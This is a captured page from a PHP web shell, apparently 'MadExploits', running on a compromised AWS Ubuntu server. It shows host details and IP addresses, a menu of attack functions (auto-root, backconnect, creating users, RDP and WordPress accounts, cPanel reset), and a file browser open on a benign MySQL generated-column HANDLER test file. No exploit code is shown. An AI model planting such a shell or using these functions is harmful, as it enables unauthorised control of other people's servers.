Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.219.241.228
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
gcol /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
gcol_blocked_sql_funcs_main.in...
11.78
KB
-rw-r--r--
gcol_cleanup.inc
1.34
KB
-rw-r--r--
gcol_column_def_options.inc
20.94
KB
-rw-r--r--
gcol_dependancies_on_vcol.inc
2.39
KB
-rw-r--r--
gcol_handler.inc
3.03
KB
-rw-r--r--
gcol_init_vars.pre
1.17
KB
-rw-r--r--
gcol_ins_upd.inc
18.39
KB
-rw-r--r--
gcol_keys.inc
26.66
KB
-rw-r--r--
gcol_non_stored_columns.inc
6.42
KB
-rw-r--r--
gcol_partition.inc
5.8
KB
-rw-r--r--
gcol_rejected.inc
21.29
KB
-rw-r--r--
gcol_select.inc
40.05
KB
-rw-r--r--
gcol_supported_sql_funcs.inc
1.63
KB
-rw-r--r--
gcol_supported_sql_funcs_main....
41.09
KB
-rw-r--r--
gcol_trigger_sp.inc
2.84
KB
-rw-r--r--
gcol_unsupported_storage_engin...
1.38
KB
-rw-r--r--
gcol_view.inc
6.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gcol_handler.inc
################################################################################ # inc/gcol_handler.inc # # # # Purpose: # # Testing HANDLER. # # # # # # # #------------------------------------------------------------------------------# # Original Author: Andrey Zhakov # # Original Date: 2008-09-04 # # Change Author: # # Change Date: # # Change: # ################################################################################ create table t1 (a int, b int generated always as (-a) virtual, c int generated always as (-a) stored, d char(1), index (a), index (c)); insert into t1 (a,d) values (4,'a'), (2,'b'), (1,'c'), (3,'d'); select * from t1; --echo # HANDLER tbl_name OPEN handler t1 open; --echo # HANDLER tbl_name READ non-gcol_index_name > (value1,value2,...) handler t1 read a > (2); --echo # HANDLER tbl_name READ non-gcol_index_name > (value1,value2,...) WHERE non-gcol_field=expr handler t1 read a > (2) where d='c'; --echo # HANDLER tbl_name READ gcol_index_name = (value1,value2,...) handler t1 read c = (-2); --echo # HANDLER tbl_name READ gcol_index_name = (value1,value2,...) WHERE non-gcol_field=expr handler t1 read c = (-2) where d='c'; --echo # HANDLER tbl_name READ non-gcol_index_name > (value1,value2,...) WHERE gcol_field=expr handler t1 read a > (2) where b=-3 && c=-3; --echo # HANDLER tbl_name READ gcol_index_name <= (value1,value2,...) handler t1 read c <= (-2); --echo # HANDLER tbl_name READ gcol_index_name > (value1,value2,...) WHERE gcol_field=expr handler t1 read c <= (-2) where b=-3; --echo # HANDLER tbl_name READ gcol_index_name FIRST handler t1 read c first; --echo # HANDLER tbl_name READ gcol_index_name NEXT handler t1 read c next; --echo # HANDLER tbl_name READ gcol_index_name PREV handler t1 read c prev; --echo # HANDLER tbl_name READ gcol_index_name LAST handler t1 read c last; --echo # HANDLER tbl_name READ FIRST where non-gcol=expr handler t1 read FIRST where a >= 2; --echo # HANDLER tbl_name READ FIRST where gcol=expr handler t1 read FIRST where b >= -2; --echo # HANDLER tbl_name READ NEXT where non-gcol=expr handler t1 read NEXT where d='c'; --echo # HANDLER tbl_name READ NEXT where gcol=expr handler t1 read NEXT where b<=-4; --echo # HANDLER tbl_name CLOSE handler t1 close; drop table t1;
Close